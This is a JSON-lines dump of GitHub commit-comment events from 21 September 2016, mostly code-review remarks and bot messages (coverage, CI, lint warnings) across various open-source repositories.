{"id":"4596180052","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113535,"position":374,"line":374,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:19:02Z","updated_at":"2016-09-21T13:19:02Z","body":"改下名字  `lastImage`"}},"created_at":"2016-09-21T13:19:02Z"}
{"id":"4596180275","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113536,"position":null,"line":null,"path":null,"commit_id":"214661b6c68635652c154764f19a218da80a82fc","created_at":"2016-09-21T13:19:04Z","updated_at":"2016-09-21T13:19:04Z","body":"finish #31 "}},"created_at":"2016-09-21T13:19:04Z"}
{"id":"4596182025","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113540,"position":null,"line":null,"path":null,"commit_id":"3ab8a3c7c6b094cca6ec1fa7615a4296314e1713","created_at":"2016-09-21T13:19:22Z","updated_at":"2016-09-21T13:19:22Z","body":"finish #31 "}},"created_at":"2016-09-21T13:19:22Z"}
{"id":"4596183573","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113545,"position":null,"line":null,"path":null,"commit_id":"ce58afc5da97b596973acb8f8ab2c7dae8076ca9","created_at":"2016-09-21T13:19:39Z","updated_at":"2016-09-21T13:19:39Z","body":"finish #31 "}},"created_at":"2016-09-21T13:19:39Z"}
{"id":"4596183953","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113547,"position":390,"line":390,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:19:43Z","updated_at":"2016-09-21T13:19:43Z","body":"要是没有历史图片，就截一张图传过去"}},"created_at":"2016-09-21T13:19:43Z"}
{"id":"4596185355","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113548,"position":null,"line":null,"path":null,"commit_id":"215daa0b41ee2256c3d61f5271688c0cbeadbf2a","created_at":"2016-09-21T13:19:58Z","updated_at":"2016-09-21T13:19:58Z","body":"[Code coverage](https://149-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T13:19:58Z"}
{"id":"4596185572","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113550,"position":16,"line":16,"path":"minicap_test.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:20:01Z","updated_at":"2016-09-21T13:20:01Z","body":"这个文件的重复代码太多"}},"created_at":"2016-09-21T13:20:01Z"}
{"id":"4596186183","type":"CommitCommentEvent","actor":{"login":"yarikoptic"},"repo":{"name":"bpoldrack/datalad"},"payload":{"comment":{"id":19113551,"position":8,"line":596,"path":"datalad/distribution/install.py","commit_id":"5f5de3673af696670ca6f806626ea31913ab2d02","created_at":"2016-09-21T13:20:08Z","updated_at":"2016-09-21T13:20:08Z","body":"and I know that some folks just want to kick PR out, but could there be at least one test for this somewhat important usecase?  we (well, the poor tester of yours) keep running into issues which aren't solidified in tests"}},"created_at":"2016-09-21T13:20:08Z"}
{"id":"4596187037","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113555,"position":null,"line":null,"path":null,"commit_id":"8a3082c78ad8d28dcc855a77f080f161b11b8920","created_at":"2016-09-21T13:20:16Z","updated_at":"2016-09-21T13:20:16Z","body":"[Code coverage](https://150-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T13:20:16Z"}
{"id":"4596195454","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113569,"position":null,"line":null,"path":null,"commit_id":"5b1320d799408e5055c0e3baaa2c70396e78d7c4","created_at":"2016-09-21T13:21:50Z","updated_at":"2016-09-21T13:21:50Z","body":"It should be possible to achieve the same result without adding more code into Scope, by reusing existing images:\r\n```\r\nsudo docker run -p 8080:80 httpd\r\n```\r\n```\r\nsudo docker ps\r\nexport IP=$(sudo docker inspect -f '{{ json .NetworkSettings.Gateway }}' ccc7e3cda719)\r\nsudo docker run -ti alpine wget http://$IP:8080\r\n```"}},"created_at":"2016-09-21T13:21:50Z"}
{"id":"4596197366","type":"CommitCommentEvent","actor":{"login":"Zayelion"},"repo":{"name":"SalvationDevelopment/Salvation-Scripts-Production"},"payload":{"comment":{"id":19113573,"position":null,"line":null,"path":null,"commit_id":"9243bc02842b137fe515032af459bc9dde0ee28e","created_at":"2016-09-21T13:22:10Z","updated_at":"2016-09-21T13:22:10Z","body":"\"You don't have to worry where your god is, he's right here, and he's fresh out of mercy\""}},"created_at":"2016-09-21T13:22:10Z"}
{"id":"4596199126","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"bugsnag/bugsnag-php"},"payload":{"comment":{"id":19113578,"position":12,"line":12,"path":"example/php-expanded/index.php","commit_id":"78197f6c2566f406d94b3823f750d6e50998c5e3","created_at":"2016-09-21T13:22:28Z","updated_at":"2016-09-21T13:22:28Z","body":"There are loads of ways tbh. All of them are OOP though."}},"created_at":"2016-09-21T13:22:28Z"}
{"id":"4596200303","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113586,"position":70,"line":70,"path":"rotation.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:22:40Z","updated_at":"2016-09-21T13:22:40Z","body":"这句话只能当调试的时候用，正式发布的时候不能出现任何额外的输出"}},"created_at":"2016-09-21T13:22:40Z"}
{"id":"4596202689","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113589,"position":76,"line":76,"path":"rotation.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:23:06Z","updated_at":"2016-09-21T13:23:06Z","body":"ps是什么意思？"}},"created_at":"2016-09-21T13:23:06Z"}
{"id":"4596204507","type":"CommitCommentEvent","actor":{"login":"yarikoptic"},"repo":{"name":"bpoldrack/datalad"},"payload":{"comment":{"id":19113592,"position":8,"line":596,"path":"datalad/distribution/install.py","commit_id":"5f5de3673af696670ca6f806626ea31913ab2d02","created_at":"2016-09-21T13:23:26Z","updated_at":"2016-09-21T13:23:26Z","body":"actually looking at commits I see now `test_get_mixed_hierarchy` ... I guess it tests it... sorry for bitching and THANKS! ;)"}},"created_at":"2016-09-21T13:23:26Z"}
{"id":"4596205256","type":"CommitCommentEvent","actor":{"login":"skofgar"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19113595,"position":19,"line":15,"path":"Sources/NSCalendar+Timepiece.swift","commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T13:23:34Z","updated_at":"2016-09-21T13:23:34Z","body":"Ok. Yeah - exactly what I tried too ;)"}},"created_at":"2016-09-21T13:23:34Z"}
{"id":"4596210614","type":"CommitCommentEvent","actor":{"login":"skofgar"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19113603,"position":null,"line":null,"path":null,"commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T13:24:31Z","updated_at":"2016-09-21T13:24:31Z","body":"Ok - Thank you!\r\nFYI: Mine passes all the tests - in case you are interested ;)"}},"created_at":"2016-09-21T13:24:31Z"}
{"id":"4596211539","type":"CommitCommentEvent","actor":{"login":"alonpeer"},"repo":{"name":"DiUS/pact-jvm"},"payload":{"comment":{"id":19113605,"position":23,"line":23,"path":"CHANGELOG.md","commit_id":"a209a8cc6a47c37690c55c978f33655a0d754608","created_at":"2016-09-21T13:24:41Z","updated_at":"2016-09-21T13:24:41Z","body":"This was already introduced in release 3.3."}},"created_at":"2016-09-21T13:24:41Z"}
{"id":"4596211797","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"collective/collective.cover"},"payload":{"comment":{"id":19113606,"position":null,"line":null,"path":null,"commit_id":"9f661875c7bdf6e2e0f9470bfda3200aa4225f9f","created_at":"2016-09-21T13:24:44Z","updated_at":"2016-09-21T13:24:44Z","body":"Here is the Plone Deprecation Guide:\r\nhttp://docs.plone.org/develop/styleguide/deprecation.html\r\nNote that it says that in the `instance/zeoclient` section of your buildout, you need to add `deprecation-warnings = on`, otherwise you don't see any warnings.\r\n\r\nAlso, note that `zope.deprecation` can still be very useful. It keeps the old location working. The core `warnings` module is most useful for some easy cases.\r\n\r\nNote that with your change in `layout.py` it looks like everyone who imports `layout` gets this warning, which then makes it seem like the whole `layout` module is deprecated. It *should* preferably be the case that you only get a warning when you actually use the old `BaseGrid` class."}},"created_at":"2016-09-21T13:24:44Z"}
{"id":"4596213041","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113608,"position":91,"line":91,"path":"rotation.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:24:57Z","updated_at":"2016-09-21T13:24:57Z","body":"程序退出之后 channel顺手关掉吧，另外 这个apk自己故障的时候，也需要考虑下怎么处理"}},"created_at":"2016-09-21T13:24:57Z"}
{"id":"4596214364","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113610,"position":98,"line":98,"path":"rotation.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:25:12Z","updated_at":"2016-09-21T13:25:12Z","body":"终于看完了"}},"created_at":"2016-09-21T13:25:12Z"}
{"id":"4596215321","type":"CommitCommentEvent","actor":{"login":"gdisirio"},"repo":{"name":"ChibiOS/ChibiOS"},"payload":{"comment":{"id":19113615,"position":null,"line":null,"path":null,"commit_id":"4491129f54af198c7df8507b07e2d3a93581b998","created_at":"2016-09-21T13:25:21Z","updated_at":"2016-09-21T13:25:21Z","body":"Hi,\r\n\r\nBest place for questions is the ChibiOS forum. Anyway, about your question, lwIP has been patched because:\r\n\r\n1) A small bug (assumption that context switch happens after leaving a critical zone, ChibiOS switches immediately, other OSes do that to, that behavior is FreeRTOS-specific I believe).\r\n2) A semaphore function is called from within a critical zone, ChibiOS requires to call a specific function variant with S suffix.\r\n\r\nIf you search \"CHIBIOS FIX\" in the code you will find all changes (not much really).\r\n\r\nGiovanni"}},"created_at":"2016-09-21T13:25:21Z"}
{"id":"4596215381","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19113616,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-21T13:25:21Z","updated_at":"2016-09-21T13:25:21Z","body":"Shouldn't this include '/msg' and '/w' and '/reply' as well?"}},"created_at":"2016-09-21T13:25:21Z"}
{"id":"4596217827","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"bugsnag/bugsnag-php"},"payload":{"comment":{"id":19113625,"position":12,"line":12,"path":"example/php-expanded/index.php","commit_id":"78197f6c2566f406d94b3823f750d6e50998c5e3","created_at":"2016-09-21T13:25:47Z","updated_at":"2016-09-21T13:25:47Z","body":"There is one other procedural way to do it that I can think of that might be preferable if you'd prefer that. I can PR that much later tonight if you want. I'm away from my desk for a while."}},"created_at":"2016-09-21T13:25:47Z"}
{"id":"4596218252","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19113629,"position":35,"line":647,"path":"man/vsearch.1","commit_id":"abb5ab42a19cf0eb4084ad4612db8619e20af0ed","created_at":"2016-09-21T13:25:52Z","updated_at":"2016-09-21T13:25:52Z","body":"That last part is not true, vsearch does not replace the CIGAR string with a \"=\" when the two sequences are identical. Usearch does (v7 and v8). "}},"created_at":"2016-09-21T13:25:52Z"}
{"id":"4596218733","type":"CommitCommentEvent","actor":{"login":"schmidtdav"},"repo":{"name":"schmidtdav/elisaR"},"payload":{"comment":{"id":19113630,"position":5,"line":16,"path":"analysis_script.R","commit_id":"63ffad79428955086052b1bcada031a90fdf61e8","created_at":"2016-09-21T13:25:57Z","updated_at":"2016-09-21T13:25:57Z","body":"test"}},"created_at":"2016-09-21T13:25:57Z"}
{"id":"4596225342","type":"CommitCommentEvent","actor":{"login":"dper"},"repo":{"name":"dper/pumptweet"},"payload":{"comment":{"id":19113638,"position":null,"line":null,"path":null,"commit_id":"3642fa254c527463ac5e0c1bfbf7a8dc2cdbbf7a","created_at":"2016-09-21T13:27:07Z","updated_at":"2016-09-21T13:27:07Z","body":"This one was weird. In Python 3.4, using HTMLParser, if the \"close()\" command is missing, then strings that don't contain any HTML were coming back empty. The clients I regularly use post messages with HTML tags, and I only found this bug when screwing around with PyPump. Even then, my two boxes performed differently. The most notable difference is Python 3.4, where I was seeing the weird behavior, and Python 3.5, where I wasn't. Well, that was somewhat bizarre. :-)"}},"created_at":"2016-09-21T13:27:07Z"}
{"id":"4596228091","type":"CommitCommentEvent","actor":{"login":"MZorzy"},"repo":{"name":"PokemonGoF/PokemonGo-Web"},"payload":{"comment":{"id":19113645,"position":200,"line":1137,"path":"js/main.js","commit_id":"34fbf98776b9c056e0428ee0f054b43963d2be62","created_at":"2016-09-21T13:27:34Z","updated_at":"2016-09-21T13:27:34Z","body":"firefox 49.0 say :\r\nSyntaxError: expected expression, got '*' main.js:1139:30\r\nso no playerdata/map. white screen."}},"created_at":"2016-09-21T13:27:34Z"}
{"id":"4596258507","type":"CommitCommentEvent","actor":{"login":"dvdstelt"},"repo":{"name":"Particular/EndToEnd"},"payload":{"comment":{"id":19113685,"position":null,"line":null,"path":null,"commit_id":"7642ec9429207097ee273725b81b0ec233f7ac43","created_at":"2016-09-21T13:32:49Z","updated_at":"2016-09-21T13:32:49Z","body":"Wat? In een keer naar master? Da's evil!!"}},"created_at":"2016-09-21T13:32:49Z"}
{"id":"4596260984","type":"CommitCommentEvent","actor":{"login":"fmalcher"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19113690,"position":null,"line":null,"path":null,"commit_id":"c1f516ff483c8d26c77950d5e6665d9116c85fca","created_at":"2016-09-21T13:33:14Z","updated_at":"2016-09-21T13:33:14Z","body":"Oh, hatte ich wohl vergessen...\r\nHab mich dann doch entschieden, beim Lazy-Loading den Namen der Klasse mit anzugeben, damit wir das `default` bei den Mini-Monkeys nicht eintragen müssen."}},"created_at":"2016-09-21T13:33:14Z"}
{"id":"4596269403","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19113711,"position":null,"line":null,"path":null,"commit_id":"e6e646da36bf4e14044de0a796f2f66520af169c","created_at":"2016-09-21T13:34:41Z","updated_at":"2016-09-21T13:34:41Z","body":"Galactic Civil War*******"}},"created_at":"2016-09-21T13:34:41Z"}
{"id":"4596270917","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19113714,"position":null,"line":null,"path":null,"commit_id":"d249d64a6653633bc36f57ed9241ad9f3e1b8b81","created_at":"2016-09-21T13:34:57Z","updated_at":"2016-09-21T13:34:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MzsgWOG_Sk-TbQ4Gj5smPw"}},"created_at":"2016-09-21T13:34:57Z"}
{"id":"4596271619","type":"CommitCommentEvent","actor":{"login":"koppen37"},"repo":{"name":"koppen37/TCR"},"payload":{"comment":{"id":19113715,"position":null,"line":null,"path":null,"commit_id":"627c8f32953a204bd775723ed1c7c01b86b220e0","created_at":"2016-09-21T13:35:04Z","updated_at":"2016-09-21T13:35:04Z","body":"survices bla bla\r\n"}},"created_at":"2016-09-21T13:35:04Z"}
{"id":"4596282499","type":"CommitCommentEvent","actor":{"login":"krisklau"},"repo":{"name":"LSTS/dune"},"payload":{"comment":{"id":19113735,"position":null,"line":null,"path":null,"commit_id":"dc2b39a664479d46f0a026c77d377a50374ade32","created_at":"2016-09-21T13:36:56Z","updated_at":"2016-09-21T13:36:56Z","body":"Hi, \r\n\r\nAny specific reason why this task was removed?"}},"created_at":"2016-09-21T13:36:56Z"}
{"id":"4596284668","type":"CommitCommentEvent","actor":{"login":"radarsat1"},"repo":{"name":"siconos/siconos"},"payload":{"comment":{"id":19113742,"position":null,"line":null,"path":null,"commit_id":"c918475f23b84c7c24ac3f49959b28ccd0833245","created_at":"2016-09-21T13:37:19Z","updated_at":"2016-09-21T13:37:19Z","body":"Et  `numerics/src/NCP/#NCP_PathSearch.c#`, ça devrait être supprimé ou renommé?"}},"created_at":"2016-09-21T13:37:19Z"}
{"id":"4596288911","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19113749,"position":5,"line":16,"path":"Cura.proto","commit_id":"281e647b82ea58d19fa43b833ea9a9d4dba5fba8","created_at":"2016-09-21T13:38:02Z","updated_at":"2016-09-21T13:38:02Z","body":"Does the comment still apply?"}},"created_at":"2016-09-21T13:38:02Z"}
{"id":"4596291047","type":"CommitCommentEvent","actor":{"login":"rdoursenaud"},"repo":{"name":"Dolibarr/dolibarr"},"payload":{"comment":{"id":19113752,"position":null,"line":null,"path":null,"commit_id":"3b09dc53cd186d99887f7158f76ea898268b1cca","created_at":"2016-09-21T13:38:23Z","updated_at":"2016-09-21T13:38:23Z","body":"@eldy\r\nI'm very pissed off by this commit.\r\nI had to track it down to understand why my situation invoices were not working the way they're supposed to.\r\nYour solution of removing the code altogether is reckless and rude. (Lines 961-993 and 1427-1428)\r\nI'm trying very hard to not be an asshole anymore (I know I've been a jerk at times and I apologize for my behavior) but you're making it very difficult.\r\nYou could at least ask for some insights from the original developer.\r\nI can understand that my code is not good enough and causing issues.\r\nI can even fix it if you open an issue and ping me.\r\nIt's not like if I'm not part of the community!\r\nYou make us all look bad with irresponsible moves like these."}},"created_at":"2016-09-21T13:38:23Z"}
{"id":"4596293515","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19113755,"position":null,"line":null,"path":null,"commit_id":"09a5d4c4c63360a03445f94a49ec0bc7d5322ac6","created_at":"2016-09-21T13:38:47Z","updated_at":"2016-09-21T13:38:47Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/09a5d4c4c63360a03445f94a49ec0bc7d5322ac6/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T13:38:47Z"}
{"id":"4596295880","type":"CommitCommentEvent","actor":{"login":"BigWavelet"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113759,"position":98,"line":98,"path":"rotation.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:39:12Z","updated_at":"2016-09-21T13:39:12Z","body":"毕竟codeskyblue，我明天逐一改"}},"created_at":"2016-09-21T13:39:12Z"}
{"id":"4596296043","type":"CommitCommentEvent","actor":{"login":"andip71"},"repo":{"name":"OnePlusOSS/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":19113760,"position":null,"line":null,"path":null,"commit_id":"ada398b71d7e24f3db71bfbe132f1c30383ba1e9","created_at":"2016-09-21T13:39:14Z","updated_at":"2016-09-21T13:39:14Z","body":"Jupp. I hope @leonfish77101  can shed light into that soon."}},"created_at":"2016-09-21T13:39:14Z"}
{"id":"4596296441","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19113762,"position":5,"line":91,"path":"cura/CuraApplication.py","commit_id":"479f9ea6d237dd02cc8e03d670b758b4a53b7b2e","created_at":"2016-09-21T13:39:18Z","updated_at":"2016-09-21T13:39:18Z","body":"It would be nice to add a comment documenting this property here (because the name is still not als clear as eg settable_per_extruder is)"}},"created_at":"2016-09-21T13:39:18Z"}
{"id":"4596299663","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"jsk-ros-pkg/jsk_visualization"},"payload":{"comment":{"id":19113771,"position":null,"line":null,"path":null,"commit_id":"ceba73e350d49a230c511324592e8aeb3110a1f5","created_at":"2016-09-21T13:39:51Z","updated_at":"2016-09-21T13:39:51Z","body":"Thank you, but I think I have already merged this branch and you need to create another pull request"}},"created_at":"2016-09-21T13:39:51Z"}
{"id":"4596300163","type":"CommitCommentEvent","actor":{"login":"NeroBurner"},"repo":{"name":"hunter-packages/rapidjson"},"payload":{"comment":{"id":19113773,"position":null,"line":null,"path":null,"commit_id":"47cb70e878d884a7ef6c9e7c5ad00642ab5aae42","created_at":"2016-09-21T13:39:56Z","updated_at":"2016-09-21T13:39:56Z","body":"@ruslo  I don't understand why this change is needed. Can you please explain why you change the version definition and cmake-config files for the use in hunter?"}},"created_at":"2016-09-21T13:39:56Z"}
{"id":"4596300872","type":"CommitCommentEvent","actor":{"login":"rduivenvoorde"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19113774,"position":null,"line":null,"path":null,"commit_id":"2cf9243edbec4d5dce82e4e7d86437d1c306fb2c","created_at":"2016-09-21T13:40:03Z","updated_at":"2016-09-21T13:40:03Z","body":"Mmm, looking into the source of maptips because I have some troubles on Windows with it.\r\n\r\nBut: so if I want to use expressions, I use.. displayExpression... huh oh no: mapTipTemplate :-)\r\n\r\nwhat about mapTipTemplate (or mapTipExpression) and maptipField (just because we can as long as there is not a QGIS3)..."}},"created_at":"2016-09-21T13:40:03Z"}
{"id":"4596317590","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19113818,"position":null,"line":null,"path":null,"commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-21T13:42:50Z","updated_at":"2016-09-21T13:42:50Z","body":"I have no idea where to add this info. My first idea is to add this information to the device list in the first part of the page and use links to point reader directly to the specific tool. Something like:\r\n\r\nYou can use MicroPython on various boards such as:\r\n* BBC micro:bit (**Mu IDE**, **uFlash**) ([webpage](https://www.microbit.co.uk/))\r\n* Boards with the ESP8266 chip (**esptool**) ([various boards wiki](http://www.esp8266.com/wiki/doku.php?id=esp8266-module-family))\r\n\r\nBut use a [link]() instead of **bold** text. If somebody has a better idea, we can discuss it tomorrow."}},"created_at":"2016-09-21T13:42:50Z"}
